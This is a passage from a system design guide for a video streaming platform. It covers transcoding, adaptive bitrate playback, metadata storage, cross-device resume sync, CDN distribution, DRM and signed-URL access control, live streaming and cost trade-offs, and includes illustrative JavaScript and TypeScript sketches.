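    lines.push(`${rendition.name}/playlist.m3u8`);
  }
  return lines.join('\n') + '\n';
}

const masterPlaylist = buildMasterPlaylist(QUALITY_LADDER);
console.log(masterPlaylist);
```

The player reads this file first, then picks one of the listed media playlists based on its ABR decision.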

3.3 Ancillary Background Jobs

Thumbnail Generation: Extracting keyframes at specific intervals to generate "Preview Sprites" for the frontend seek-bar.
Content Moderation: Running ML models to scan for spam, copyright violations, or prohibited content.
CDN Warming: Proactively pushing the newly created manifest and initial segments to edge caches in regions where the creator has a high following.

3.4 Ingestion Architecture (ASCII)

┌─────────┐      ┌────────────────┐      ┌──────────────┐      ┌───────────────┐
│ Creator │ ───> │ Upload Service │ ───> │ Raw S3 Bucket│ ───> │ Message Queue │
└─────────┘      └────────────────┘      └──────────────┘      └───────┬───────┘
                                                                       │
┌───────────────┐      ┌──────────────┐      ┌─────────────────┐       │
│ Metadata DB   │ <─── │ Storage (CDN)│ <─── │ Transcode Worker│ <─────┘
└───────────────┘      └──────────────┘      └─────────────────┘

End of Chapter 3

Chapter 4 — The Frontend Player Engine & ABR Logic (The "Spine" Core)

This chapter addresses the "Brain" of the system: the Client-Side Player. We treat the player not as a UI component, but as a resource orchestrator that manages the hardware-software bridge.

4.1 Architecture of a Production-Grade Player

To prevent UI jank, we separate the playback logic from the rendering thread.

The Controller: Coordinates between the UI, the network, and the hardware buffer.
The Buffering Engine (MSE): Utilizes Media Source Extensions (MSE) to feed binary video segments into the browser's <video> tag.
The Decryption Module (EME): Handles Encrypted Media Extensions (EME) for DRM-protected content (Widevine/FairPlay).

4.2 Adaptive Bitrate (ABR) Heuristics

The player must decide which quality to download next without human intervention. We use a Hybrid Algorithm:

Throughput-Based: Measures the download speed of the last few segments.
Buffer-Based (BBA): Measures how many seconds of video are currently stored in RAM.
- Safe Zone (30s+): Stay at High Quality.
- Danger Zone (<10s): Aggressively switch to Low Quality to avoid a "Spinner."
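
One possible way to combine the two signals is sketched below. The 0.8 safety factor, the ladder bitrates, and the behaviour between 10s and 30s (pure throughput-based selection) are assumptions made for this example; production players tune these heavily.

```javascript
const DANGER_ZONE_SECONDS = 10;
const SAFE_ZONE_SECONDS = 30;
const SAFETY_FACTOR = 0.8; // assumption: only spend 80% of measured throughput

// ladder must be sorted from lowest to highest bitrate.
function chooseRendition(ladder, current, throughputKbps, bufferSeconds) {
  // Danger zone: drop to the lowest quality to avoid a stall.
  if (bufferSeconds < DANGER_ZONE_SECONDS) return ladder[0];

  // Throughput-based pick: highest rendition that fits the budget.
  const budgetKbps = throughputKbps * SAFETY_FACTOR;
  let sustainable = ladder[0];
  for (const rendition of ladder) {
    if (rendition.kbps <= budgetKbps) sustainable = rendition;
  }

  // Safe zone: a large buffer absorbs a throughput dip, so never switch down.
  if (bufferSeconds >= SAFE_ZONE_SECONDS && current.kbps > sustainable.kbps) {
    return current;
  }
  return sustainable;
}

const abrLadder = [
  { name: '360p', kbps: 800 },
  { name: '720p', kbps: 2500 },
  { name: '1080p', kbps: 5000 },
  { name: '4K', kbps: 16000 },
];
const playing1080p = abrLadder[2];
console.log(chooseRendition(abrLadder, playing1080p, 4000, 5).name);  // 360p
console.log(chooseRendition(abrLadder, playing1080p, 4000, 20).name); // 720p
console.log(chooseRendition(abrLadder, playing1080p, 4000, 35).name); // 1080p
```

The same measured throughput produces three different decisions, which is the point of mixing buffer level into the heuristic.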

4.3 Handling the "Thin Client" vs. "Thick Client"

Staff engineers must account for hardware diversity.

Feature	Thick Client (Desktop/PS5)	Thin Client (2018 Smart TV)
Logic	Runs full ABR heuristics locally.	Server dictates the bitrate.
Threading	Uses Web Workers for parsing.	Single-threaded, synchronous.
Buffering	Large 60s forward buffer.	Minimal 5-8s buffer to avoid RAM crash.

4.4 The Internal Player State Machine

The player does not just "Play" or "Pause." It transitions through complex states:

IDLE: Resource allocation.
LOADING: Fetching the Master Manifest (.m3u8).
STALLED: Buffer empty; UI shows "spinner," ABR shifts to lowest bitrate.
SEEKING: Clearing the current buffer and performing a "Cold Start" at the new timestamp.
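
A transition table keeps these states honest. The sketch below adds a PLAYING state and a set of allowed transitions that are assumptions of this example (the list above names only four states); `createPlayerStateMachine` is a hypothetical helper.

```javascript
// Allowed transitions; PLAYING and the edges themselves are illustrative.
const TRANSITIONS = {
  IDLE: ['LOADING'],
  LOADING: ['PLAYING', 'IDLE'],
  PLAYING: ['STALLED', 'SEEKING', 'IDLE'],
  STALLED: ['PLAYING', 'SEEKING', 'IDLE'],
  SEEKING: ['PLAYING', 'STALLED', 'IDLE'],
};

function createPlayerStateMachine() {
  let state = 'IDLE';
  return {
    get state() {
      return state;
    },
    transition(next) {
      if (!TRANSITIONS[state].includes(next)) {
        throw new Error(`Illegal transition ${state} -> ${next}`);
      }
      state = next;
      return state;
    },
  };
}

const player = createPlayerStateMachine();
player.transition('LOADING'); // manifest requested
player.transition('PLAYING'); // first segments buffered
player.transition('STALLED'); // buffer ran dry
console.log(player.state);    // STALLED
```

Rejecting illegal transitions early (for example IDLE straight to PLAYING) tends to surface player bugs as exceptions instead of silent UI glitches.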

4.5 Performance Optimization: The "Zero-Latency" Goal

Thumbnail Sprites (WebVTT): Fetching a single "Sprite Sheet" image for the seek-bar, indexed by a WebVTT thumbnail track, rather than individual frames.
Pre-fetching: Using <link rel="prefetch"> for the first 3 segments of the "Next Video" in a playlist.
Request Interleaving: Prioritizing the video chunk download over secondary metadata (like comments or likes) on slow networks.


    [ UI: React ] <--- (Events) --- [ Player State Manager ]
                                           ^
                                           |
    [ Adaptive Bitrate Logic ] <---> [ Segment Downloader ]
                                           |
    [ Media Source Extensions ] <----------+
             |
             v
    [ Hardware Decoder ] --> [ Screen ]

End of Chapter 4

Chapter 5 — Metadata DB, Schema, and Discovery (Merged Logic)

While the video bytes live on the CDN, the Metadata Plane handles the "Brain" of the platform: users, subscriptions, and video details. This chapter merges the SQL/NoSQL strategy from the Backend Doc with the Discovery requirements of the Frontend Spine.

5.1 The Data Modeling Strategy

We use a polyglot persistence model to balance ACID transactions (for ownership) with High Availability (for views/likes).

Primary Database (PostgreSQL/Spanner)

Users Table: userId, email, channelName, subscriptionLevel.
Videos Table: videoId, creatorId, title, description, manifestUrl, thumbnailUrl, status (Processing/Live/Private).
Subscriptions: (followerId, creatorId) with composite unique index.

High-Frequency Metadata (Cassandra/BigTable)

View Counts & Likes: These require massive write-throughput. We use an Eventual Consistency model where counts are buffered in Redis and flushed to Cassandra.
Comments: Stored in a wide-column store, partitioned by videoId.

5.2 Discovery & Search Architecture

The Frontend "Home Feed" and "Search Bar" are powered by a specialized indexing layer.

Search Index (Elasticsearch/OpenSearch):
- Whenever a video is transcoded, the Metadata Service pushes a document to Elasticsearch.
- Insight: We use "Fuzzy Matching" and "Autocomplete" to handle typos in the frontend search bar.
Recommendation Engine:
- Feature Store: Collects user signals (watch time, skipped videos, likes).
- Ranking Service: A machine learning model that generates a list of videoIds for the user’s home feed.

5.3 Scalability Trade-offs

Decision	Choice	Why?
Video ID	UUID/Snowflake	Avoids sequential IDs that make scraping by enumeration easy, and allows distributed generation.
Consistency	Eventual	A 1-second delay in "Like" count visibility is better than a system crash during a viral video.
Database Sharding	By VideoId	Spreads videos evenly across DB nodes. A single viral video still lands on one shard, so its hot reads must be absorbed by the Redis cache rather than the shard itself.

5.4 The API Handshake (Frontend Fetching)

The Frontend does not "join" tables. It calls a BFF (Backend-for-Frontend) or GraphQL Gateway:

GET /v1/video/:id returns a pre-aggregated JSON object containing video details, creator info, and the HLS manifest URL.
Prefetching Logic: When the user hovers over a thumbnail, the frontend pre-warms the Metadata Cache to make the actual click feel instant.

[ Metadata Flow ]

[ Client ] <---(GraphQL/REST)---> [ Metadata Service ]
                                         |
               +-------------------------+-------------------------+
               |                         |                         |
        [ PostgreSQL ]            [ Redis Cache ]           [ Elasticsearch ]
        (Users/Permissions)       (Hot Metadata)            (Video Search)

End of Chapter 5

Chapter 6 — State Management & Multi-Device Resume Sync

In a global platform, "State" exists in three places: the Local UI, the Video Player, and the Cloud. Maintaining a seamless "Continue Watching" experience requires a sophisticated synchronization strategy.

6.1 The State Hierarchy

Volatile State (UI): Search queries, hover states, menu toggles. Stored in React State / Signals.
Player State: Current playback timestamp, volume, selected quality. Stored in a specialized Player Controller.
Persistent State: Watch history, "Resume" points, User preferences. Stored in the Cloud.

6.2 The "Resume-Sync" Pipeline

How does Netflix know you stopped at 12:45 on your TV and show it on your phone instantly?

Client-Side Heartbeat: The Player Engine emits a "Pulse" event every 5-10 seconds.
Throttling & Batching: To avoid DDoS-ing our own backend, the Frontend batches these pulses. We don't send an API call for every second played.
The Write-Ahead Log (WAL): The Backend receives the pulse and appends it to a high-speed log (Kafka).
The Sync Store: A high-availability Key-Value store (Redis/Cassandra) updates the last_watched_pos for the userId:videoId pair.
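
The client half of this pipeline might look like the sketch below: pulses are recorded locally and only the latest position per video is sent on each flush. `createHeartbeatBatcher` and the payload shape are assumptions of this example; in a browser, `flush` would be driven by a timer.

```javascript
// send(batch) is whatever posts the batch to the backend.
function createHeartbeatBatcher(send) {
  const latest = new Map(); // videoId -> most recent pulse

  return {
    // Called on every player pulse; cheap, no network involved.
    record(videoId, positionSeconds, clientTimestamp) {
      latest.set(videoId, { positionSeconds, clientTimestamp });
    },
    // Called on a timer; sends one entry per video, then resets.
    flush() {
      if (latest.size === 0) return 0;
      const batch = [...latest].map(([videoId, pulse]) => ({ videoId, ...pulse }));
      latest.clear();
      send(batch);
      return batch.length;
    },
  };
}

const sentBatches = [];
const batcher = createHeartbeatBatcher((batch) => sentBatches.push(batch));
batcher.record('video-42', 755, 1000);
batcher.record('video-42', 760, 6000);
batcher.record('video-42', 765, 11000);
batcher.flush();
console.log(sentBatches); // one batch containing only the 765s position
```

Three pulses collapse into a single request, and an idle player sends nothing at all.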

6.3 Handling Conflicts (The Edge Case)

If a user is watching on two devices simultaneously:

Conflict Resolution: We follow a Last-Write-Wins (LWW) or Max-Timestamp logic.
Race Conditions: If the user closes the app suddenly, we utilize the navigator.sendBeacon() API or a Service Worker to send a "Final Pulse" before the process is killed.
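
Last-Write-Wins reduces to a timestamp comparison. The sketch below assumes each pulse carries an `updatedAt` value from reasonably synchronized clocks (or one assigned by the server); the field names are hypothetical.

```javascript
// Keep whichever resume point was written last.
function mergeResumePoint(stored, incoming) {
  if (!stored) return incoming;
  return incoming.updatedAt >= stored.updatedAt ? incoming : stored;
}

const fromTv = { device: 'tv', positionSeconds: 765, updatedAt: 2000 };
const fromPhone = { device: 'phone', positionSeconds: 120, updatedAt: 1500 };

// The phone's older pulse arrives late and is ignored.
let resumePoint = mergeResumePoint(undefined, fromTv);
resumePoint = mergeResumePoint(resumePoint, fromPhone);
console.log(resumePoint.device, resumePoint.positionSeconds); // tv 765
```

The comparison is on write time, not playback position, so rewinding on the most recent device is still respected.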

6.4 Local State Persistence (Offline Mode)

For the "Partial Offline Download" requirement:

IndexedDB: We store downloaded video segments and their metadata in the browser's IndexedDB.
Background Sync: When the user goes back online, a Service Worker triggers a background sync to upload any "Watch History" accumulated while offline.

6.5 State Management Architecture (ASCII)

[ Device A ]                                [ Device B ]
     |                                           |
(Heartbeat: 10s)                            (Fetch Resume)
     |                                           |
     v                                           v
[ API Gateway ] ───> [ Redis / Cassandra ] <── [ Metadata API ]
     |                  (Resume Store)
     +───> [ Kafka ] ───> [ Analytics DB ]

End of Chapter 6

Chapter 7 — Global Distribution & CDN Strategy

A single centralized cloud region is too far from most viewers for video. To hit the < 2 second TTFF (Time to First Frame) target from Chapter 1, we must move the data as close to the user's ISP as possible using a multi-tiered distribution strategy.

7.1 Multi-Tier CDN Architecture

We do not rely on a single origin. We use a layered approach:

Origin Server (S3): The source of truth for all transcoded segments.
Regional Edges: Larger caches that store 80% of popular content within a geographic region (e.g., US-East).
Local Edge (PoPs): Small, highly distributed servers inside local ISPs. These store the "Top 10%" viral videos to ensure zero-buffering for the most-watched content.

7.2 Cache Invalidation vs. Short TTLs

Video segments are Immutable. Once segment_101.ts is created, it never changes.

Strategy: We set a very long TTL for video segments (for example Cache-Control: max-age=31536000, immutable).
The Manifest Problem: Unlike segments, the Manifest (.m3u8) is dynamic (especially for Live). We use a short TTL (1-2s) for manifests or a Cache-Control: no-cache strategy to ensure the player always knows the latest state of the stream.
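
A minimal sketch of that policy as a function from object path to `Cache-Control` header. The one-year `max-age` stands in for "effectively forever", the 2-second manifest TTL follows the range above, and the `no-store` fallback is an assumption of this example.

```javascript
// Pick a Cache-Control header based on the file extension.
function cacheControlFor(path) {
  // Segments are immutable: cache them for a year and never revalidate.
  if (/\.(ts|m4s)$/.test(path)) return 'public, max-age=31536000, immutable';
  // Manifests change (especially for Live): keep the TTL very short.
  if (/\.(m3u8|mpd)$/.test(path)) return 'public, max-age=2';
  // Assumption: anything else is not cached at the edge.
  return 'no-store';
}

console.log(cacheControlFor('video/abc/720p/segment_101.ts'));
console.log(cacheControlFor('video/abc/master.m3u8'));
```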

7.3 Geo-Routing & Request Steering

When a user hits "Play," the system must decide which CDN to use:

Anycast: The same IP address is announced from many PoPs, and network routing (BGP) delivers the user to the nearest one.
Latency-Based Routing: The Backend Metadata API provides a manifest URL pointing to the CDN with the lowest current latency for that user's specific IP.

7.4 Content Steering (Fault Tolerance)

What if a major CDN provider (like Akamai or Cloudflare) goes down?

Client-Side Steering: The manifest contains URLs for multiple CDNs. If the Frontend Player detects a 5xx error or a timeout from CDN A, it automatically fails over to CDN B without stopping the video.
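
The failover decision itself is small. The sketch below assumes the manifest has already been parsed into a list of CDN base URLs; `createCdnSelector` and the example hostnames are hypothetical, and a timeout is modelled as a `null` status.

```javascript
function createCdnSelector(baseUrls) {
  let active = 0;
  return {
    urlFor(segmentPath) {
      return `${baseUrls[active]}/${segmentPath}`;
    },
    // status: HTTP status code, or null when the request timed out.
    // Returns true if the player should retry the segment on the new CDN.
    reportResult(status) {
      const failed = status === null || status >= 500;
      if (failed) active = (active + 1) % baseUrls.length;
      return failed;
    },
  };
}

const cdn = createCdnSelector(['https://cdn-a.example.com', 'https://cdn-b.example.com']);
console.log(cdn.urlFor('segment_101.ts')); // https://cdn-a.example.com/segment_101.ts
cdn.reportResult(503);                     // CDN A is failing
console.log(cdn.urlFor('segment_101.ts')); // https://cdn-b.example.com/segment_101.ts
```

A 4xx response deliberately does not trigger a switch here, since an expired token or missing file would fail on every CDN.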

7.5 The "Hot" Video Problem (Thundering Herd)

When a viral video is released, millions of people request the same segment at the same millisecond.

Request Collapsing: The CDN Edge ensures that if 1,000 requests come in for the same segment, it only sends one request back to the origin, then broadcasts the result to all 1,000 users.
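
Request collapsing is essentially a map of in-flight promises. This sketch shows only the collapsing step, not the cache that would sit in front of it; `createCollapsingFetcher` is a hypothetical name and the origin fetch is faked.

```javascript
// Wrap an origin fetch so that concurrent requests for the same key share
// a single in-flight promise.
function createCollapsingFetcher(fetchFromOrigin) {
  const inFlight = new Map();
  return function get(key) {
    if (inFlight.has(key)) return inFlight.get(key);
    const promise = (async () => fetchFromOrigin(key))()
      .finally(() => inFlight.delete(key)); // allow a fresh fetch afterwards
    inFlight.set(key, promise);
    return promise;
  };
}

let originCalls = 0;
const getSegment = createCollapsingFetcher(async (key) => {
  originCalls += 1;
  return `bytes-of-${key}`;
});

// 1,000 viewers ask for the same segment at the same moment.
const pendingRequests = Array.from({ length: 1000 }, () => getSegment('segment_101.ts'));
console.log(originCalls); // 1
Promise.all(pendingRequests).then((results) => console.log(results.length)); // 1000
```

All callers receive the same promise, so the origin sees one request no matter how large the herd is.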

7.6 Distribution Architecture (ASCII)

[ Origin S3 ]
      |
      +-----> [ Regional Cache (London) ]
      |              |
      |              +-----> [ Local PoP (UK ISP) ] ---> [ Viewer A ]
      |              +-----> [ Local PoP (EU ISP) ] ---> [ Viewer B ]
      |
      +-----> [ Regional Cache (Mumbai) ]
                     |
                     +-----> [ Local PoP (India ISP) ] --> [ Viewer C ]

End of Chapter 7

Chapter 8 — Security, DRM Handshake & Access Control (Merged)

For a video platform, security is more than just an Auth token; it is an end-to-end chain of trust that protects billions of dollars in intellectual property while ensuring seamless user access.

8.1 The Access Control Handshake

We use a decoupled security model where the Backend defines the policy and the CDN enforces it.

Authentication: Users authenticate via OAuth2/OIDC. The server sets a short-lived JWT in a Secure, HttpOnly cookie, so page scripts cannot read it.
Authorization: When a user clicks "Play," the Frontend requests a Signed URL or Cookie from the Backend.
CDN Enforcement: The CDN Edge validates the signature (HMAC) on the request. If the signature is expired or the IP doesn't match, the request is rejected at the edge, saving origin bandwidth.
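
A sketch of the signing and edge-side check using Node's built-in `crypto` module. The URL format (`expires` and `sig` query parameters) is an assumption of this example, since each CDN defines its own, and IP binding is left out for brevity.

```javascript
const crypto = require('node:crypto');

// HMAC-SHA256 over the path and expiry, hex encoded.
function signature(secret, path, expiresAt) {
  return crypto.createHmac('sha256', secret).update(`${path}:${expiresAt}`).digest('hex');
}

// Backend: issue a URL that is valid until expiresAt (unix seconds).
function signUrl(secret, path, expiresAt) {
  return `${path}?expires=${expiresAt}&sig=${signature(secret, path, expiresAt)}`;
}

// Edge: reject expired or tampered URLs without contacting the origin.
function verifyUrl(secret, url, nowSeconds) {
  const [path, query = ''] = url.split('?');
  const params = new URLSearchParams(query);
  const expiresAt = Number(params.get('expires'));
  if (!Number.isFinite(expiresAt) || nowSeconds > expiresAt) return false;

  const expected = Buffer.from(signature(secret, path, expiresAt), 'hex');
  const given = Buffer.from(params.get('sig') || '', 'hex');
  // timingSafeEqual requires equal lengths, so check that first.
  return given.length === expected.length && crypto.timingSafeEqual(given, expected);
}

const signedUrl = signUrl('demo-secret', '/v/abc/segment_1.ts', 1000);
console.log(verifyUrl('demo-secret', signedUrl, 900));  // true
console.log(verifyUrl('demo-secret', signedUrl, 1001)); // false (expired)
```

Because the check needs only the shared secret, the edge can reject bad requests without any call back to the backend.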

8.2 Digital Rights Management (DRM)

To deter stream ripping and unauthorized screen recording, we implement a DRM Handshake using the browser's EME (Encrypted Media Extensions).

The Components:
- CDM (Content Decryption Module): A sandbox in the browser/OS that handles decryption keys.
- License Server: A backend service that verifies the user's right to watch and issues a decryption key.
The Flow:
1. The Player detects encrypted segments in the manifest.
2. The Player asks the CDM for a License Request (an opaque challenge that identifies the device) and sends it to our License Server.
3. The Server returns an encrypted key.
4. The CDM decrypts the media inside its sandbox (on hardware-backed devices, in a protected path down to the GPU), so the "Clear Text" video never touches the JavaScript heap.

8.3 Protecting the API & Metadata

Rate Limiting: Using a Leaky Bucket algorithm at the API Gateway to prevent "View Count" manipulation and scraping.
CORS & CSRF: Strict Origin policies to ensure only our official web/mobile clients can initiate playback.
Geofencing: Backend checks the user's Geo-IP against the video's distribution rights before issuing a Signed URL.

8.4 Security Architecture (ASCII)

[ Browser / CDM ]          [ API Gateway ]          [ License Server ]
       |                          |                         |
(1) Get Signed URL -------------> | (Verify JWT & Rights)   |
       | <--- (Signed URL) -------|                         |
       |                          |                         |
(2) Request Segments (CDN)        |                         |
       |                          |                         |
(3) EME License Request ----------------------------------> |
       | <--- (Encrypted Key) ----------------------------- |
       |                          |                         |
(4) Decrypt & Render              |                         |

End of Chapter 8

Chapter 9 — Real-time Engagement & Live Streaming Deep-Dive

Live streaming is the "final boss" of video engineering. The creator's side shifts from a one-off file upload to a continuous "push" stream, and end-to-end latency must stay within a few seconds (our target is < 5 seconds) while segments are still being produced.

9.1 The Live Ingestion Pipeline

Unlike VOD, where we transcode the whole file, Live requires Streaming Transcoding.

Ingestion (RTMP/SRT): The creator's encoder (like OBS) pushes a continuous stream to our Live Ingest Service.
Transmuxing: The backend converts the incoming stream into tiny LL-HLS (Low-Latency HLS) or DASH chunks (typically 1-second segments).
The Live Edge: The CDN must be optimized to never cache the "Manifest" for more than a fraction of a second, ensuring users are always at the "Live Edge."

9.2 Real-time Engagement (Comments & Likes)

To handle viral moments (e.g., a sports final with 10M+ viewers), we cannot use standard polling.

WebSocket Gateways: Maintain persistent connections for the "Live Chat."
Pub/Sub (Kafka/Redis): When a comment is posted:
1. The Comment Service writes to a DB.
2. The event is published to a Redis Pub/Sub topic.
3. The WebSocket Gateway "fans out" the message to all connected viewers of that specific videoId.
Throttling & Sampled Likes: For massive streams, we don't show every single "Like" in real-time. We aggregate and sample at the edge to prevent the UI from becoming a resource hog.

9.3 DVR & Catch-up Capability

Systems allow users to "Rewind" a live stream.

Rolling Window: The CDN and Origin keep the last 2 hours of segments available.
Manifest Manipulation: The Frontend Player detects the #EXT-X-PLAYLIST-TYPE:EVENT tag and allows the seek-bar to move backward into the cached segments while the stream continues at the edge.

9.4 Challenge: The "Herd" Effect

When the stream ends, 10 million people hit the "Home" button at once.

Solution: We use Staggered Reconnection and Jitter in our frontend retry logic to ensure that a massive audience doesn't crash the discovery services upon exit.
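
One common way to implement the jitter is "full jitter" exponential backoff, sketched below. The function names, the 500 ms base, and the 30 s cap are assumptions chosen for illustration, not values taken from the design above.

```typescript
// Full-jitter backoff: the delay is uniform in [0, min(capMs, baseMs * 2^attempt)).
function backoffDelayMs(
  attempt: number,
  baseMs: number = 500,
  capMs: number = 30000,
  random: () => number = Math.random,
): number {
  const ceiling = Math.min(capMs, baseMs * Math.pow(2, attempt));
  return Math.floor(random() * ceiling);
}

// Retry an async operation, sleeping a jittered delay between failed attempts.
async function retryWithJitter<T>(
  operation: () => Promise<T>,
  maxAttempts: number = 5,
  sleep: (ms: number) => Promise<void> = (ms) =>
    new Promise<void>((resolve) => setTimeout(resolve, ms)),
): Promise<T> {
  let lastError: unknown;
  for (let attempt = 0; attempt < maxAttempts; attempt++) {
    try {
      return await operation();
    } catch (error) {
      lastError = error;
      // No point sleeping after the final attempt.
      if (attempt < maxAttempts - 1) {
        await sleep(backoffDelayMs(attempt));
      }
    }
  }
  throw lastError;
}
```

Because each client draws its own random delay, 10 million simultaneous retries spread across the whole backoff interval instead of arriving in synchronized waves.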

9.5 Live & Engagement Architecture (ASCII)

[ Creator ] --(RTMP)--> [ Ingest ] --+--> [ Transcoder ] --(HLS)--> [ CDN ]
                                     |
                                     +--> [ Frame Capture ] (Thumbnails)

[ Viewer ] <--(WS)--> [ Gateway ] <--(Pub/Sub)-- [ Engagement Service ]
    |                                                |
    +----(GET/POST)----------------------------------+

End of Chapter 9

Chapter 10 — Cost Model, Performance Trade-offs, and Final Architecture

In an interview, the final goal is to prove that the system is not just technically sound, but economically viable. This chapter explains the "Business Logic" of our architectural choices.

10.1 The Economic Model of Video

The biggest costs in this system are Bandwidth, CDN Egress, and Storage. Everything else (CPU for APIs, Database lookups) is negligible by comparison.

The "Thick Client" Strategy: By moving ABR logic and buffering to the frontend, we utilize the user's local CPU for free, rather than paying for server-side logic.
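Storage Tiering: We tier storage by access pattern using S3 lifecycle rules (S3 Intelligent-Tiering is an alternative when access patterns are unpredictable). Raw videos move to "Glacier" (Cold) after 30 days, while transcoded fragments stay in "S3 Standard" (Hot) for CDN delivery.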

10.2 Performance Trade-offs (Decisions)

Decision	Choice	The Trade-off
Consistency	Eventual	We sacrifice perfect counters (Likes/Views) for absolute availability of playback.
Latency	Buffering	We intentionally delay playback start by 2-3 segments to ensure a "Stall-free" experience.
Resolution	Transcoding	We spend money upfront on transcoding to save money on bandwidth later (by serving smaller files).

10.3 Summary of the "Sweet Spot" Architecture

This design succeeds because it separates concerns into three distinct layers:

The Client (Spine): Controls reality. It handles the network's unpredictability and manages the hardware resources.
The Edge (CDN): Controls scale. It brings the bits to the user's doorstep, bypassing the slow public internet.
The Backend (Foundation): Controls policy. It handles metadata, security keys, and the heavy lifting of transcoding.

10.4 Final Conclusion for the Interview

"We have built a system that is Offline-First, Global by Design, and Economically Optimized. By leveraging a metadata-driven ingestion pipeline and a sophisticated client-side player engine, we ensure that the platform remains performant for the next 100M users, regardless of their device or network speed."

📄 Document Audit Checklist

[x] Ingestion: Resumable, chunked, and multi-bitrate.
[x] Playback: ABR, MSE/EME, and Frame-accurate seeking.
[x] Discovery: Decoupled metadata DB with search indexing.
[x] Scale: Multi-tier CDN and Edge-caching.
[x] Security: Signed URLs and DRM Handshake.
[x] Consistency: Eventual consistency for engagement; Strong for auth.

End of Chapter 10.

Chapter 11 — The End-to-End Playback Lifecycle: A Narrative Walkthrough

To tie the previous 10 chapters together, we will trace the journey of a single user (Alice) watching a single video (4K "Nature Documentary") from the moment she hits "Play" to the moment she switches devices.

11.1 Phase 1: The Handshake (Chapters 5 & 8)

Action: Alice clicks the "Play" button on her React-based Discovery Feed.
The Logic:
1. The Frontend calls the Discovery API (Chapter 5) to fetch video metadata.
2. Simultaneously, the Security Service (Chapter 8) issues a Signed Manifest URL and a DRM License Challenge.
3. The browser receives a JSON response containing the Master Manifest URL (.m3u8).

11.2 Phase 2: Orchestration & ABR (Chapter 4)

Action: The Player Controller (Chapter 4) takes over.
The Logic:
1. The player downloads the Master Manifest.
2. The ABR Logic Unit (Chapter 4) detects Alice is on a 50Mbps connection and chooses the 4K variant.
3. The Segment Downloader maps the 4K variant to a specific CDN Edge location (Chapter 7).
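
The variant choice in step 2 can be sketched as picking the highest rung of the bitrate ladder that fits within a safety margin of the measured throughput. The ladder bitrates, the 0.8 safety factor, and the names `Variant` and `chooseVariant` are assumptions for illustration; the actual ABR Logic Unit may also weigh buffer level and screen size.

```typescript
interface Variant {
  name: string;
  bandwidthBps: number; // BANDWIDTH attribute from the master manifest
}

// Pick the highest-bitrate variant that fits within a fraction of measured throughput.
function chooseVariant(
  variants: Variant[],
  throughputBps: number,
  safetyFactor: number = 0.8,
): Variant {
  if (variants.length === 0) throw new Error("no variants in manifest");
  const sorted = [...variants].sort((a, b) => a.bandwidthBps - b.bandwidthBps);
  const budgetBps = throughputBps * safetyFactor;
  let choice = sorted[0]; // fall back to the lowest rung if nothing fits
  for (const variant of sorted) {
    if (variant.bandwidthBps <= budgetBps) choice = variant;
  }
  return choice;
}

// Hypothetical ladder; the bitrates are illustrative, not taken from this design.
const exampleLadder: Variant[] = [
  { name: "360p", bandwidthBps: 1e6 },
  { name: "720p", bandwidthBps: 3e6 },
  { name: "1080p", bandwidthBps: 6e6 },
  { name: "2160p", bandwidthBps: 20e6 },
];
```

Under these assumed numbers, Alice's 50Mbps connection leaves a 40Mbps budget, so `chooseVariant(exampleLadder, 50e6)` selects the 2160p (4K) rung.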

11.3 Phase 3: The Data Flow (Chapter 3 & 7)

Action: Pixels move from the Edge to the Screen.
The Logic:
1. The browser requests segment_001.ts from the CDN.
2. The CDN Edge (Chapter 7) serves the file from its SSD cache (originally generated by the Transcoder in Chapter 3).
3. The binary data is fed into the Media Source Extensions (MSE) buffer (Chapter 4).
4. The CDM/DRM Module (Chapter 8) decrypts the data in hardware, and Alice sees the first frame.

11.4 Phase 4: Reality Reporting (Chapter 6 & 9)

Action: The system "remembers" Alice’s experience.
The Logic:
1. Every 10 seconds, the Frontend emits a Heartbeat (Chapter 6).
2. This pulse updates the Resume Store (Chapter 6) so Alice can switch to her iPad later.
3. High-volume signals like "Likes" or "Real-time Views" flow through Kafka to update the global counters (Chapter 9).

11.5 Phase 5: The Handover

Action: Alice closes her laptop and opens her phone.
The Logic:
1. The Phone app calls the Metadata API.
2. It receives the last_watched_pos from the Resume Store.
3. The Player Engine seeks to 12:45, and the cycle repeats instantly.
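
The heartbeat-to-resume loop from Phases 4 and 5 can be sketched with an in-memory store. `ResumeStore`, its method names, and the rule that out-of-order heartbeats are ignored are assumptions made for this sketch; the real Resume Store would be a shared, persistent service.

```typescript
interface ResumeRecord {
  positionSec: number;
  updatedAtMs: number;
}

class ResumeStore {
  private records = new Map<string, ResumeRecord>();

  private key(userId: string, videoId: string): string {
    return userId + ":" + videoId;
  }

  // Called for every heartbeat; a heartbeat older than the stored one is ignored
  // so a delayed packet cannot move the resume point backward.
  heartbeat(userId: string, videoId: string, positionSec: number, sentAtMs: number): void {
    const k = this.key(userId, videoId);
    const existing = this.records.get(k);
    if (existing && existing.updatedAtMs > sentAtMs) return;
    this.records.set(k, { positionSec: positionSec, updatedAtMs: sentAtMs });
  }

  // What a second device reads as last_watched_pos; 0 means start from the beginning.
  lastWatchedPos(userId: string, videoId: string): number {
    const record = this.records.get(this.key(userId, videoId));
    return record ? record.positionSec : 0;
  }
}

// Format seconds as mm:ss for display on the seek bar.
function formatPosition(totalSec: number): string {
  const minutes = Math.floor(totalSec / 60);
  const seconds = Math.floor(totalSec % 60);
  return minutes + ":" + (seconds < 10 ? "0" : "") + seconds;
}
```

If the laptop's last heartbeat reported 765 seconds, the phone reads 765 from the store and seeks to `formatPosition(765)`, which is the 12:45 mark in the walkthrough.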

Summary: The Core Invariant

This narrative proves that our architecture is not just a list of services, but a synchronized loop.

The Backend defines what can be watched.
The CDN handles the weight of the bits.
The Frontend owns the decision-making logic.

End of Chapter 11.
